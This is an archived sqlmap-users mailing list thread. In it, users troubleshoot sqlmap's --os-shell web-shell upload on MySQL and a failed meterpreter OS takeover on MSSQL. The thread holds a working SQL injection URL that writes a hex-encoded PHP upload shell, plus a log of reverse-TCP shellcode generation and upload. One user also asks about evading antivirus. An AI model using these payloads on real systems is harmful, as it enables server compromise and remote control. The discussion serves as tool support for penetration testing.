>>>>> mysql> select 'ss' into outfile
>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>>>>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php'
>>>>> already exists
>>>>>
>>>>> Solution:
>>>>>
>>>>> 1. Change the web shell name for every new PAYLOAD attempt, at least
>>>>> when using the -os-shell option
>>>>> 2. Fix the PAYLOAD causing problems.
>>>>>
>>>>> --
>>>>> DanUx
>>>>>
>>>>>
>>>>> ------------------------------------------------------------------------------
>>>>> Don't Limit Your Business. Reach for the Cloud.
>>>>> GigeNET's Cloud Solutions provide you with the tools and support that
>>>>> you need to offload your IT needs and focus on growing your business.
>>>>> Configured For All Businesses. Start Your Cloud Today.
>>>>> https://www.gigenetcloud.com/
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>>
>>>
>>>
>>>
>>> --
>>> DanUx
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
>
> --
> DanUx
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] SQLmap --os-shell BUG

[Danux <da...@gm...>]

Just clone git and got 1.0-dev-166dc98 version but got a unhandled
exception error:

./sqlmap.py -u
http://OwaspPractice/injection/lessons/lesson03/index.php?code=N --os-shell
--prefix "\")"  --flush-session -v3

/sqlmap'. If the exception persists, please open a new issue at '
https://github.com/sqlmapproject/sqlmap/issues/new' with the following text
and any other information required to reproduce the bug. The developers
will try to reproduce the bug, fix it accordingly and get back to you
sqlmap version: 1.0-dev-166dc98
Python version: 2.7.3
Operating system: posix
Command line: sqlmap.py -u
*********************************************************************
--os-shell --prefix ") --flush-session -v3
Technique: None
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "sqlmap.py", line 102, in main
    start()
  File "lib/controller/controller.py", line 514, in start
    injection = checkSqlInjection(place, parameter, value)
  File "lib/controller/checks.py", line 391, in checkSqlInjection
    reqPayload = agent.payload(place, parameter, newValue=boundPayload,
where=where)
  File "lib/core/agent.py", line 188, in payload
    retVal = _(regex, "%s=%s" % (parameter,
self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
AttributeError: 'NoneType' object has no attribute 'replace'


On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar <mir...@gm...
> wrote:

> I believe that you are using an old revision. For a long time there is at
> least a git revision or a pseudo "non-git" number appearing when "sqlmap
> --version" is being used.
>
> Please update to the latest revision from the official github repository
> and rerun the sqlmap.
>
> Bye
>
> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:
>
>> Thanks
>>
>> sqlmap --version
>> sqlmap/1.0-dev
>>
>> In the meantime I will patch procs/mysql/write_file_limit.sql
>>
>>
>>
>>
>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <
>> mir...@gm...> wrote:
>>
>>> Which revision/version of sqlmap do you use? There has been a related
>>> patch a month ago. Will check tomorrow.
>>>
>>> Bye
>>>
>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>>
>>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>>
>>>> Description:
>>>>
>>>> A specific PAYLOAD (see below) used to upload a web shell will create
>>>> an empty file e.g. tmpbezff.php, this will cause that every subsequent
>>>> PAYLOAD attempt will fail with an "already exist" error and therefore not
>>>> able to upload the web shell.
>>>>
>>>>
>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+
>>>>
>>>> By default, MySQL will throw an error if the file already exists:
>>>>
>>>> mysql> select 'ss' into outfile
>>>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>>>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php'
>>>> already exists
>>>>
>>>> Solution:
>>>>
>>>> 1. Change the web shell name for every new PAYLOAD attempt, at least
>>>> when using the -os-shell option
>>>> 2. Fix the PAYLOAD causing problems.
>>>>
>>>> --
>>>> DanUx
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Don't Limit Your Business. Reach for the Cloud.
>>>> GigeNET's Cloud Solutions provide you with the tools and support that
>>>> you need to offload your IT needs and focus on growing your business.
>>>> Configured For All Businesses. Start Your Cloud Today.
>>>> https://www.gigenetcloud.com/
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
>>
>> --
>> DanUx
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
DanUx

Re: [sqlmap-users] SQLmap --os-shell BUG

[Miroslav S. <mir...@gm...>]

I believe that you are using an old revision. For a long time there is at
least a git revision or a pseudo "non-git" number appearing when "sqlmap
--version" is being used.

Please update to the latest revision from the official github repository
and rerun the sqlmap.

Bye

On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:

> Thanks
>
> sqlmap --version
> sqlmap/1.0-dev
>
> In the meantime I will patch procs/mysql/write_file_limit.sql
>
>
>
>
> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> Which revision/version of sqlmap do you use? There has been a related
>> patch a month ago. Will check tomorrow.
>>
>> Bye
>>
>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>
>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>
>>> Description:
>>>
>>> A specific PAYLOAD (see below) used to upload a web shell will create an
>>> empty file e.g. tmpbezff.php, this will cause that every subsequent PAYLOAD
>>> attempt will fail with an "already exist" error and therefore not able
>>> to upload the web shell.
>>>
>>>
>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+
>>>
>>> By default, MySQL will throw an error if the file already exists:
>>>
>>> mysql> select 'ss' into outfile
>>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php'
>>> already exists
>>>
>>> Solution:
>>>
>>> 1. Change the web shell name for every new PAYLOAD attempt, at least
>>> when using the -os-shell option
>>> 2. Fix the PAYLOAD causing problems.
>>>
>>> --
>>> DanUx
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Don't Limit Your Business. Reach for the Cloud.
>>> GigeNET's Cloud Solutions provide you with the tools and support that
>>> you need to offload your IT needs and focus on growing your business.
>>> Configured For All Businesses. Start Your Cloud Today.
>>> https://www.gigenetcloud.com/
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
>
> --
> DanUx
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] SQLmap --os-shell BUG

[Danux <da...@gm...>]

Thanks

sqlmap --version
sqlmap/1.0-dev

In the meantime I will patch procs/mysql/write_file_limit.sql




On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <mir...@gm...
> wrote:

> Which revision/version of sqlmap do you use? There has been a related
> patch a month ago. Will check tomorrow.
>
> Bye
>
> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>
>> Hello list, there is an issue with sqlmap when using the --os-shell
>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>
>> Description:
>>
>> A specific PAYLOAD (see below) used to upload a web shell will create an
>> empty file e.g. tmpbezff.php, this will cause that every subsequent PAYLOAD
>> attempt will fail with an "already exist" error and therefore not able
>> to upload the web shell.
>>
>>
>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+
>>
>> By default, MySQL will throw an error if the file already exists:
>>
>> mysql> select 'ss' into outfile
>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php'
>> already exists
>>
>> Solution:
>>
>> 1. Change the web shell name for every new PAYLOAD attempt, at least when
>> using the -os-shell option
>> 2. Fix the PAYLOAD causing problems.
>>
>> --
>> DanUx
>>
>>
>> ------------------------------------------------------------------------------
>> Don't Limit Your Business. Reach for the Cloud.
>> GigeNET's Cloud Solutions provide you with the tools and support that
>> you need to offload your IT needs and focus on growing your business.
>> Configured For All Businesses. Start Your Cloud Today.
>> https://www.gigenetcloud.com/
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
DanUx

Re: [sqlmap-users] SQLmap --os-shell BUG

[Miroslav S. <mir...@gm...>]

Which revision/version of sqlmap do you use? There has been a related patch
a month ago. Will check tomorrow.

Bye

On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:

> Hello list, there is an issue with sqlmap when using the --os-shell option
> in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>
> Description:
>
> A specific PAYLOAD (see below) used to upload a web shell will create an
> empty file e.g. tmpbezff.php, this will cause that every subsequent PAYLOAD
> attempt will fail with an "already exist" error and therefore not able
> to upload the web shell.
>
>
> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+
>
> By default, MySQL will throw an error if the file already exists:
>
> mysql> select 'ss' into outfile
> '/var/www/OwaspPractice/upload/tmpbezff.php';
> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php'
> already exists
>
> Solution:
>
> 1. Change the web shell name for every new PAYLOAD attempt, at least when
> using the -os-shell option
> 2. Fix the PAYLOAD causing problems.
>
> --
> DanUx
>
>
> ------------------------------------------------------------------------------
> Don't Limit Your Business. Reach for the Cloud.
> GigeNET's Cloud Solutions provide you with the tools and support that
> you need to offload your IT needs and focus on growing your business.
> Configured For All Businesses. Start Your Cloud Today.
> https://www.gigenetcloud.com/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] SQLmap --os-shell BUG

[Danux <da...@gm...>]

Hello list, there is an issue with sqlmap when using the --os-shell option
in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)

Description:

A specific PAYLOAD (see below) used to upload a web shell will create an
empty file e.g. tmpbezff.php, this will cause that every subsequent PAYLOAD
attempt will fail with an "already exist" error and therefore not able
to upload the web shell.

http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+

By default, MySQL will throw an error if the file already exists:

mysql> select 'ss' into outfile
'/var/www/OwaspPractice/upload/tmpbezff.php';
ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php'
already exists

Solution:

1. Change the web shell name for every new PAYLOAD attempt, at least when
using the -os-shell option
2. Fix the PAYLOAD causing problems.

-- 
DanUx

[sqlmap-users] Unsubscribe

[Gianluca C. B. <g...@br...>]

----- Messaggio originale -----
Da: "sql...@li..." <sql...@li...>
Inviato: ‎02/‎07/‎2015 14:02
A: "sql...@li..." <sql...@li...>
Oggetto: sqlmap-users Digest, Vol 50, Issue 2

Send sqlmap-users mailing list submissions to
	sql...@li...

To subscribe or unsubscribe via the World Wide Web, visit
	https://lists.sourceforge.net/lists/listinfo/sqlmap-users
or, via email, send a message with subject or body 'help' to
	sql...@li...

You can reach the person managing the list at
	sql...@li...

When replying, please edit your Subject line so it is more specific
than "Re: Contents of sqlmap-users digest..."


Today's Topics:

   1. Error with operating system takeover (meterpreter)
      (Peter Laboratra)
   2. Upload file with SQL Injection (Peter Laboratra)
   3. Re: Upload file with SQL Injection (Brandon Perry)
   4. Re: Error with operating system takeover	(meterpreter)
      (Miroslav Stampar)
   5. Re: Error with operating system takeover	(meterpreter)
      (Peter Laboratra)
   6. Re: Error with operating system takeover	(meterpreter)
      (Miroslav Stampar)
   7. Re: Error with operating system takeover	(meterpreter)
      (Peter Laboratra)


----------------------------------------------------------------------

Message: 1
Date: Wed, 1 Jul 2015 20:25:20 +0530
From: Peter Laboratra <myp...@gm...>
Subject: [sqlmap-users] Error with operating system takeover
	(meterpreter)
To: sql...@li...
Message-ID:
	<CAGr38JNrhJBHa23WuMDw=byU...@ma...>
Content-Type: text/plain; charset="utf-8"

Hi All,

In first phase of our test we discovered Target URL is vulnerable and we
managed to retrieved lots of information such as --users, --dbs, some of
--tables and lots more. All this retrieval was very slow probably due to
time-based vulnerability; however tried through all (BEUSTQ) and found same
state.

During an attempt after few days of our success we noticed some of the
parameter is not working and we are receiving errors like for instance
during requery for --users we received error "[09:39:23] [CRITICAL] unable
to retrieve the number of database users". During requery for -U sa
--passwords we received "unnable to retrieve the password hashes for the
database users (probably because the session user has no read privileges
over the relevant system database table)".

We moved to OS takeover, initially get error for xp_cmdshell however
activated and confirmed using SQLNinja and moved on to get --os-shell,
executed some of commands like "hostname", "whoami" and successfully
retrieved its output.

Now after few minutes we noted that we are not getting any output of any
command with message "No output".

We moved to --os-pwn + --msf-path, But again with no success on meterpreter
or VNC.
received error "HTTP error codes detected during run:
404 (Not Found) - 1 times"

I'm attaching screen log, please help me with this if thr is any scope
available.
Thanks in Advance.



-------screen logs start-------

root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S
--dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t
test_msf7 -v 2
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 10:03:33

mytarget_login
[10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
[10:03:33] [DEBUG] not a valid WebScarab log data
[10:03:33] [DEBUG] cleaning up configuration parameters
test_msf7
mytarget_login
/opt/metasploit/apps/pro/msf3
[10:03:33] [INFO] setting file for logging HTTP traffic
[10:03:33] [DEBUG] setting the HTTP timeout
[10:03:33] [DEBUG] creating HTTP requests opener object
[10:03:33] [DEBUG] forcing back-end DBMS to user defined value
[10:03:33] [DEBUG] setting the takeover out-of-band functionality
[10:03:33] [DEBUG] provided Metasploit Framework path
'/opt/metasploit/apps/pro/msf3' is valid
[10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the Cookie
[10:03:33] [DEBUG] resolving hostname 'mytarget.com'
[10:03:33] [INFO] testing connection to the target URL
[10:03:48] [DEBUG] declared web page charset 'utf-8'
sqlmap got a 302 redirect to '
https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to follow?
[Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST
data to a new location? [Y/n] Y
[10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection
reset by peer')
[10:03:56] [DEBUG] heuristically checking if the target is protected by
some kind of WAF/IPS/IDS
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Parameter: testNumber (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload:
example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333';
WAITFOR DELAY '0:0:5'--&testPassword=3243
    Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
[10:03:56] [INFO] testing Microsoft SQL Server
[10:03:56] [INFO] confirming Microsoft SQL Server
[10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL
Server/MSSQ^10.MSSQLSERVER/MSSQLaLo
? as temporary files directory
[10:04:00] [INFO] testing if current user is DBA
[10:04:00] [DEBUG] creating a support table to write commands standard
output to
[10:04:00] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[10:04:04] [WARNING] it is very important not to stress the network adapter
during usage of time-based payloads to prevent potential errors
[10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
[10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
[10:04:04] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[10:04:05] [ERROR] unable to retrieve xp_cmdshell output
[10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine
(default)
[2] Reverse TCP: Try to connect back from the database host to this
machine, on all ports example3ween the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine
tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine
tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [192.168.1.8]
which local port number do you want to use? [61371]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
[10:04:17] [DEBUG] executing local command:
/opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R |
/opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o
"/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
[10:04:17] [INFO] creation in progress .................. done
[10:04:35] [DEBUG] the shellcode size is 308 bytes
[10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo
?/tmpsebykt.exe'
[10:04:35] [DEBUG] going to upload the binary file with stacked query SQL
injection technique
[10:04:35] [INFO] using PowerShell to write the binary file content to file
'D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
?\tmpsebykt.exe'
[10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program
Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
?\tmpfidjf.txt,
please wait..
[10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to
D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
?\tmppsbcbi.ps1
[10:04:36] [DEBUG] executing the PowerShell base64-decoding script to write
the D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
?\tmpsebykt.exe file, please wait..
[10:04:37] [WARNING] if you experience problems with non-ASCII identifier
names you are advised to rerun with '--tamper=charunicodeencode'
[10:04:37] [DEBUG] checking the length of the remote file D:\Program
Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
?\tmpsebykt.exe
[10:04:37] [INFO] retrieved:
[10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
[10:04:37] [WARNING] it looks like the file has not been written (usually
occurs if the DBMS process' user has no write privileges in the destination
path)
do you want to try to upload the file with the custom Visual Basic script
technique? [Y/n] Y
[10:04:41] [INFO] using a custom visual basic script to write the binary
file content to file 'D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
?\tmpsebykt.exe', please wait..
[10:04:41] [DEBUG] uploading the file base64-encoded content to D:\Program
Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
?\tmpfegab.txt,
please wait..
[10:04:41] [CRITICAL] page not found (404)
[10:04:41] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that
some kind of protection is involved (e.g. WAF)

[*] shutting down at 10:04:41

root@kali:~#


-------screen logs end-------


Please help!!
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 2
Date: Wed, 1 Jul 2015 20:32:01 +0530
From: Peter Laboratra <myp...@gm...>
Subject: [sqlmap-users] Upload file with SQL Injection
To: sql...@li...
Message-ID:
	<CAGr38JNfRqwtyCmmzEOcLRmRHJW5=7Qm_e2y0njqjfEh8WH=eQ...@ma...>
Content-Type: text/plain; charset="utf-8"

Hi All,

Need help in uploading a non-malicious file on vulnerable target.

In several cases I noted that shell upload or meterpreter fails due to an
effective & active Anti-Virus installed on vulnerable target as it got
delete due to malicious nature (even after certain level of msf encoding.

I also noted that in most of the cases method of uploading using
--sql-shell fail due to lack of stack-query related issues.

In that case is there a way to upload a file which is not malicious if
objective is not to take control of system and just requires uploading a
file.
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 3
Date: Wed, 1 Jul 2015 10:10:47 -0500
From: Brandon Perry <bpe...@gm...>
Subject: Re: [sqlmap-users] Upload file with SQL Injection
To: Peter Laboratra <myp...@gm...>
Cc: sqlmap users <sql...@li...>
Message-ID:
	<CAO...@ma...>
Content-Type: text/plain; charset="utf-8"

--file-write allows you to write a file, and has the ability to check if
the file was written by testing the size of the file to the file locally
you have written to ensure it was written ~correctly.

On Wed, Jul 1, 2015 at 10:02 AM, Peter Laboratra <myp...@gm...>
wrote:

> Hi All,
>
> Need help in uploading a non-malicious file on vulnerable target.
>
> In several cases I noted that shell upload or meterpreter fails due to an
> effective & active Anti-Virus installed on vulnerable target as it got
> delete due to malicious nature (even after certain level of msf encoding.
>
> I also noted that in most of the cases method of uploading using
